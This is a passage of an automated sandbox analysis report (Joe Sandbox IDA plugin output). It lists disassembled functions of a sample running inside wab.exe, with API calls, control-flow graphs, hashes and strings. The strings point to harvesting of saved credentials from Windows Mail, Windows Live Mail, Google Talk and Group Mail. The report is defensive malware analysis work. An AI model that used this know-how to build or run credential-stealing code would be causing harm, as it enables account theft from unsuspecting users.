                                                                                                                                                                                                                    Function 0044412E Relevance: 18.1, APIs: 12, Instructions: 128COMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 249 44412e-44414a call 44431c GetModuleHandleA 252 44414c-444157 249->252 253 44416b-44416e 249->253 252->253 254 444159-444162 252->254 255 444197-4441e4 __set_app_type __p__fmode __p__commode call 444318 253->255 256 444164-444169 254->256 257 444183-444187 254->257 264 4441e6-4441f1 __setusermatherr 255->264 265 4441f2-44424c call 444306 _initterm __getmainargs _initterm 255->265 256->253 259 444170-444177 256->259 257->253 260 444189-44418b 257->260 259->253 262 444179-444181 259->262 263 444191-444194 260->263 262->263 263->255 264->265 268 44424e-444256 265->268 269 444288-44428b 265->269 270 44425c-44425f 268->270 271 444258-44425a 268->271 272 444265-444269 269->272 273 44428d-444291 269->273 270->272 274 444261-444262 270->274 271->268 271->270 275 44426f-444280 GetStartupInfoA 272->275 276 44426b-44426d 272->276 273->269 274->272 277 444282-444286 275->277 278 444293-444295 275->278 276->274 276->275 279 444296-4442aa GetModuleHandleA call 40cc66 277->279 278->279 282 4442b3-4442f3 _cexit call 444355 279->282 283 4442ac-4442ad exit 279->283 283->282
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3662548030-0
                                                                                                                                                                                                                    • Opcode ID: 871beeaf43a2e3e1ebbf438e66662d4fa1d9833c620b3867bfec3142b5046d35
                                                                                                                                                                                                                    • Instruction ID: fc298a0057bb7b157c7d5bb9a283569fada43ed9a32b195ba4478b44b5386df1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 871beeaf43a2e3e1ebbf438e66662d4fa1d9833c620b3867bfec3142b5046d35
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E419F74D00714DFEB209FA4D8897AE7BB4BB85715F20016BF4519B2A2D7B88C82CB58
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004437D7 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004437F8
                                                                                                                                                                                                                      • Part of subcall function 0040732D: strlen.MSVCRT ref: 0040732F
                                                                                                                                                                                                                      • Part of subcall function 0040732D: strlen.MSVCRT ref: 0040733A
                                                                                                                                                                                                                      • Part of subcall function 0040732D: _mbscat.MSVCRT ref: 00407351
                                                                                                                                                                                                                      • Part of subcall function 0041072B: memset.MSVCRT ref: 00410780
                                                                                                                                                                                                                      • Part of subcall function 0041072B: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 004107E9
                                                                                                                                                                                                                      • Part of subcall function 0041072B: _mbscpy.MSVCRT ref: 004107F7
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00443866
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00443881
                                                                                                                                                                                                                      • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                                                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004438BA
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 004438C8
                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 004438EE
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • Store Root, xrefs: 00443892
                                                                                                                                                                                                                    • \Microsoft\Windows Live Mail, xrefs: 0044383D
                                                                                                                                                                                                                    • Software\Microsoft\Windows Live Mail, xrefs: 00443897
                                                                                                                                                                                                                    • \Microsoft\Windows Mail, xrefs: 00443816
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                                                                                                                                    • API String ID: 832325562-2578778931
                                                                                                                                                                                                                    • Opcode ID: 911bb342f14f3170cb2ff673aa6b7b07c4e29c197a8c78c2517f4db812832f04
                                                                                                                                                                                                                    • Instruction ID: 024f477f45f6e85a7703d2448ebd5bdc30730893e4efb81a5a52e1788c76f972
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 911bb342f14f3170cb2ff673aa6b7b07c4e29c197a8c78c2517f4db812832f04
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 723166B2508344AAF320FB99DC47FCB77DC9B88715F14441FF648D7182EA78964487AA
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040EDD5 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 180registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 308 40edd5-40ef32 memset * 2 call 407649 * 2 RegOpenKeyExA 313 40ef38-40ef5f RegQueryValueExA 308->313 314 40f04e-40f054 308->314 315 40f045-40f048 RegCloseKey 313->315 316 40ef65-40ef69 313->316 315->314 316->315 317 40ef6f-40ef79 316->317 318 40ef7b-40ef8d call 404666 call 40472f 317->318 319 40efec 317->319 329 40efdf-40efea call 404780 318->329 330 40ef8f-40efb3 call 4047a0 318->330 320 40efef-40eff2 319->320 320->315 322 40eff4-40f034 call 4012ee RegQueryValueExA 320->322 322->315 328 40f036-40f044 322->328 328->315 329->320 330->329 335 40efb5-40efb8 330->335 336 40efd6-40efd9 LocalFree 335->336 337 40efba-40efcf memcpy 335->337 336->329 337->336
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040EEDC
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040EEF4
                                                                                                                                                                                                                      • Part of subcall function 00407649: _mbsnbcat.MSVCRT ref: 00407669
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040EF2A
                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040EF57
                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F02C
                                                                                                                                                                                                                      • Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5
                                                                                                                                                                                                                      • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                                                      • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040EFC7
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040EFD9
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F048
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2012582556-3916222277
                                                                                                                                                                                                                    • Opcode ID: 1aaa39dbd8fb085207e3379016ade5c185f92c0e596cea5d3bc0b7e8a3d19efa
                                                                                                                                                                                                                    • Instruction ID: 747b8e804c7bbb21ad1dd8da88f93546a58f2d2a8080c646c51fe7008e5948b4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1aaa39dbd8fb085207e3379016ade5c185f92c0e596cea5d3bc0b7e8a3d19efa
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83811E618087CB9ECB21DBBC8C445DDBF745F17234F0843A9E5B47A2E2D3245A46C7AA
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004037BC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 338 4037bc-40380e memset * 2 call 443a35 341 4038d4-4038d7 338->341 342 403814-403874 call 4021ad call 406ca4 * 2 strchr 338->342 349 403876-403887 _mbscpy 342->349 350 403889-403894 strlen 342->350 351 4038b1-4038cf _mbscpy call 4023d7 349->351 350->351 352 403896-4038ae sprintf 350->352 351->341 352->351
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004037DD
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004037F1
                                                                                                                                                                                                                      • Part of subcall function 00443A35: memset.MSVCRT ref: 00443A57
                                                                                                                                                                                                                      • Part of subcall function 00443A35: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00443AC3
                                                                                                                                                                                                                      • Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
                                                                                                                                                                                                                      • Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE
                                                                                                                                                                                                                    • strchr.MSVCRT ref: 00403860
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040387D
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00403889
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 004038A9
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 004038BF
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                                                                                                                                    • String ID: %s@yahoo.com
                                                                                                                                                                                                                    • API String ID: 317221925-3288273942
                                                                                                                                                                                                                    • Opcode ID: c01e396ce511f8afc2eb7639449ba7f1f99c67e08b3586f0ab7a0846487aca4e
                                                                                                                                                                                                                    • Instruction ID: 0355cd0d48ae578dfdfe4a6cbfa0b9af13deca75d91fcedaec1ea3361aee035e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c01e396ce511f8afc2eb7639449ba7f1f99c67e08b3586f0ab7a0846487aca4e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0215773D0412C5EEB21EA55DD41BDA77ACDF45308F0000EBB648F6081E6789F588F55
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004034D6 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 354 4034d6-403536 memset * 2 call 410493 357 403572-403574 354->357 358 403538-403571 _mbscpy call 406af3 _mbscat call 4033e2 354->358 358->357
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004034F6
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040350C
                                                                                                                                                                                                                      • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00403547
                                                                                                                                                                                                                      • Part of subcall function 00406AF3: strlen.MSVCRT ref: 00406AF4
                                                                                                                                                                                                                      • Part of subcall function 00406AF3: _mbscat.MSVCRT ref: 00406B0B
                                                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040355F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                                                                                                                                    • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                                                                                                                    • API String ID: 3071782539-966475738
                                                                                                                                                                                                                    • Opcode ID: e35c848a323c92a1d31842152f609aeddade97801a3e26e866ac83a52e1d0630
                                                                                                                                                                                                                    • Instruction ID: 06cca456285af6d778403e239192c4ceeddf5a100a2cf1fec545289e95a886a3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e35c848a323c92a1d31842152f609aeddade97801a3e26e866ac83a52e1d0630
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6901F07294412866EB20F2658C46FCB7A5C9B65705F0000B7BA49F20C3D9F86BD486A9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040C9F7 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 363 40c9f7-40ca26 ??2@YAPAXI@Z 364 40ca28-40ca2d 363->364 365 40ca2f 363->365 366 40ca31-40ca44 ??2@YAPAXI@Z 364->366 365->366 367 40ca46-40ca4d call 40400d 366->367 368 40ca4f 366->368 370 40ca51-40ca77 367->370 368->370 372 40ca86-40caf9 call 406e26 call 4019b4 memset LoadIconA call 4019b4 _mbscpy 370->372 373 40ca79-40ca80 DeleteObject 370->373 373->372
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2054149589-0
                                                                                                                                                                                                                    • Opcode ID: d475ca6c561f5eaf4fc753d3c68d3f995f62fff83656612615d29b2a36e03343
                                                                                                                                                                                                                    • Instruction ID: 30546b7ffc0c4dd123ee27c8339ba671db17b069e44cca125f5e111fbf26b461
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d475ca6c561f5eaf4fc753d3c68d3f995f62fff83656612615d29b2a36e03343
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D22190B5900324DBDB10EF648CC97D97BA8AB44705F1445BBEE08EF296D7B849408BA9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00408344 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00408043: memset.MSVCRT ref: 004080A5
                                                                                                                                                                                                                      • Part of subcall function 00408043: memset.MSVCRT ref: 004080B9
                                                                                                                                                                                                                      • Part of subcall function 00408043: memset.MSVCRT ref: 004080D3
                                                                                                                                                                                                                      • Part of subcall function 00408043: memset.MSVCRT ref: 004080E8
                                                                                                                                                                                                                      • Part of subcall function 00408043: GetComputerNameA.KERNEL32(?,?), ref: 0040810A
                                                                                                                                                                                                                      • Part of subcall function 00408043: GetUserNameA.ADVAPI32(?,?), ref: 0040811E
                                                                                                                                                                                                                      • Part of subcall function 00408043: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040813D
                                                                                                                                                                                                                      • Part of subcall function 00408043: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00408152
                                                                                                                                                                                                                      • Part of subcall function 00408043: strlen.MSVCRT ref: 0040815B
                                                                                                                                                                                                                      • Part of subcall function 00408043: strlen.MSVCRT ref: 0040816A
                                                                                                                                                                                                                      • Part of subcall function 00408043: memcpy.MSVCRT ref: 0040817C
                                                                                                                                                                                                                      • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408392
                                                                                                                                                                                                                      • Part of subcall function 004104D7: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 004104FA
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004083E3
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00408421
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00408448
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • Software\Google\Google Talk\Accounts, xrefs: 00408363
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
                                                                                                                                                                                                                    • String ID: Software\Google\Google Talk\Accounts
                                                                                                                                                                                                                    • API String ID: 2959138223-1079885057
                                                                                                                                                                                                                    • Opcode ID: de50773ad60ad315725188ace9b51b45ce00f3af3b72c9474aab8c158646e734
                                                                                                                                                                                                                    • Instruction ID: c6fde65740424625f6a31d6a262b66ef11e3a8462d59295f471bfbb40e3c967b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: de50773ad60ad315725188ace9b51b45ce00f3af3b72c9474aab8c158646e734
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E2183B100824AAED610DF51DD42EABB7DCEF94344F00043EFA84911A2F675DD5D9BAB
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040B783 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 403 40b783-40b795 404 40b7e2-40b7f6 call 406a00 403->404 405 40b797-40b7ad call 407baf _mbsicmp 403->405 427 40b7f8 call 410411 404->427 428 40b7f8 call 404780 404->428 429 40b7f8 call 403c03 404->429 430 40b7f8 call 410166 404->430 431 40b7f8 call 40472f 404->431 410 40b7d6-40b7e0 405->410 411 40b7af-40b7c8 call 407baf 405->411 410->404 410->405 417 40b7ca-40b7cd 411->417 418 40b7cf 411->418 412 40b7fb-40b80e call 407bbf 419 40b810-40b81c 412->419 420 40b855-40b864 SetCursor 412->420 421 40b7d0-40b7d1 call 40b340 417->421 418->421 422 40b833-40b852 qsort 419->422 423 40b81e-40b829 419->423 421->410 422->420 423->422 427->412 428->412 429->412 430->412 431->412
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Cursor_mbsicmpqsort
                                                                                                                                                                                                                    • String ID: /nosort$/sort
                                                                                                                                                                                                                    • API String ID: 882979914-1578091866
                                                                                                                                                                                                                    • Opcode ID: 3fd05ea3d2e473999241c6e710ee6662cc18b56f225bb7025ede358bdfc82e44
                                                                                                                                                                                                                    • Instruction ID: 59731eef90b6f0024c6c95bb6f71fb6a55e53d5caa10bc7ba91746e522f0a21b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fd05ea3d2e473999241c6e710ee6662cc18b56f225bb7025ede358bdfc82e44
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF21C4B1704501EFD719AB75C880AA9F3A8FF88314F21013EF419A7292C738B8118B99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0041072B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 445 41072b-410742 call 41067e 448 410744-41074d call 406e4c 445->448 449 41076d-41078b memset 445->449 457 41074f-410752 448->457 458 41075e-410761 448->458 451 410797-4107a5 449->451 452 41078d-410790 449->452 453 4107b5-4107bf call 410411 451->453 452->451 455 410792-410795 452->455 462 4107c1-4107e9 call 4106ad call 410452 RegCloseKey 453->462 463 4107ef-410802 _mbscpy 453->463 455->451 459 4107a7-4107b0 455->459 457->449 461 410754-410757 457->461 465 410768 458->465 459->453 461->449 464 410759-41075c 461->464 462->463 467 410805-410807 463->467 464->449 464->458 465->467
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0041067E: LoadLibraryA.KERNEL32(shell32.dll,0041073A,00000104), ref: 0041068C
                                                                                                                                                                                                                      • Part of subcall function 0041067E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004106A1
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00410780
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 004107E9
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 004107F7
                                                                                                                                                                                                                      • Part of subcall function 00406E4C: GetVersionExA.KERNEL32(00451168,0000001A,00410749,00000104), ref: 00406E66
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0041079B, 004107AB
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                                    • API String ID: 889583718-2036018995
                                                                                                                                                                                                                    • Opcode ID: 24424f8fb7c37ab6dcf975350972c994308c6069d3110df9dc8122139225ba6f
                                                                                                                                                                                                                    • Instruction ID: 55274f9b0d4144c5a5f6b064647028c43f69cf0431b3c32ec78c32e38a1c383e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 24424f8fb7c37ab6dcf975350972c994308c6069d3110df9dc8122139225ba6f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2811D071C00218FBEB24F6948C85EEF77AC9B15304F1400B7F95161192E6B99ED4CA99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004105DD Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FindResourceA.KERNEL32(?,?,?), ref: 004105EA
                                                                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 004105FB
                                                                                                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 0041060B
                                                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 00410616
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3473537107-0
                                                                                                                                                                                                                    • Opcode ID: aa79f82f4ecfd8f7b628c1d7de4cc48f572b3be46360eaed4676304fbba1ef3c
                                                                                                                                                                                                                    • Instruction ID: 4a68303d5b5253afd20c9a06ef53f1b3f3171458fb19c91adc6236e38678b247
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa79f82f4ecfd8f7b628c1d7de4cc48f572b3be46360eaed4676304fbba1ef3c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88019636600315AB8F155F65DC4599F7FAAFFD63917088036F909CA361D7B1C891C68C
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00410344 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0041036C
                                                                                                                                                                                                                      • Part of subcall function 0040735C: sprintf.MSVCRT ref: 00407394
                                                                                                                                                                                                                      • Part of subcall function 0040735C: memcpy.MSVCRT ref: 004073A7
                                                                                                                                                                                                                    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410390
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004103A7
                                                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(?,?,0044551F,?,00002000,?), ref: 004103C5
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3143880245-0
                                                                                                                                                                                                                    • Opcode ID: 300669213aa10e30692949e2fcfbaed099003638c554249b47492bf17e1db58e
                                                                                                                                                                                                                    • Instruction ID: 9d0f41c8c3888dc292d70de46467aaf9ffb36b28435196f73ffda5293cd27e0f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 300669213aa10e30692949e2fcfbaed099003638c554249b47492bf17e1db58e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B501847280431DBFEF116F60EC89EDB7B79EF04314F1000A6FA08A2052D6759D64DB69
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00408AA5 Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
